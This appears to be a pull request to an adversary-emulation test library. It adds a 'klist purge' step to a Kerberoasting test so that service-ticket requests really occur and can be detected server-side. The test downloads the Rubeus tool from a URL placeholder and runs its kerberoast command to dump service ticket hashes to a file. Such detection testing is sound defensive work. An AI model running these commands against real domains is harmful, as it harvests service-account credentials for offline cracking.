### PR TITLE
Kerberoasting: purge tickets before launching attack to ensure cached ones aren't used

### DIFF
--- a/atomics/T1558.003/T1558.003.yaml
+++ b/atomics/T1558.003/T1558.003.yaml
@@ -70,6 +70,7 @@ atomic_tests:
       Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
   executor:
     command: |
+      klist purge
       cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
     cleanup_command: |
       Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore


### PR DESCRIPTION
**Details:**
If we want to detect the service ticket request (sign of the kerberoasting attack) server-side we need to ensure it's actually requested.


The TGT is purged too but given that the long term session keys are in LSASS it will be re-fetched too silently

**Testing:**
* Proof of the issue: it's the 2nd kerberoasting I'm doing here and since all services tickets are already obtained there's no request:
![image](https://user-images.githubusercontent.com/550823/146224371-b82cf6ff-dd4e-4793-bd99-f6f5a26f333b.png)


* Adding a "klist purge" beforehand. Notice that the TGT is re-obtained, and also the service ticket:
![image](https://user-images.githubusercontent.com/550823/146224378-fcd31098-345c-4956-80d5-e6ce9800cea3.png)



**Associated Issues:**
None